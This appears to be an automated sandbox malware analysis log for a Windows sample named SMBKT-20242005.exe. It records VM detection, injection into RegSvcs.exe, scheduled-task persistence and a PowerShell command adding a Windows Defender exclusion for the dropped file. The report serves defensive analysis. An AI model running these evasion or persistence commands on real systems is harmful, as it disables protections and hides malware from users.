                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: SMBKT-20242005.exe PID: 7376, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: joUXSCpr.exe PID: 7852, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory allocated: 1370000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory allocated: 4D70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory allocated: 9010000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory allocated: A010000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory allocated: A220000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory allocated: B220000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory allocated: B630000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory allocated: C630000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory allocated: A220000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory allocated: B630000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory allocated: C630000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory allocated: 2C30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory allocated: 4C30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory allocated: 8A80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory allocated: 9A80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory allocated: 9C80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory allocated: AC80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory allocated: B070000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory allocated: C070000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory allocated: 9C80000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory allocated: B070000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory allocated: C070000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8181Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1449Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 471Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 944Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 4734Jump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe TID: 7428Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe TID: 7876Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99866Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99749Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99286Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99154Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98499Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98281Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98171Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98062Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97950Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97842Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97734Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97624Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97405Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97296Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96968Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                    Source: joUXSCpr.exe, 00000009.00000002.1490355465.0000000000ED4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`pS
                    Source: RegSvcs.exe, 00000008.00000002.1477888050.0000000006510000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe"
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe"Jump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1044008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EDC008Jump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeQueries volume information: C:\Users\user\Desktop\SMBKT-20242005.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
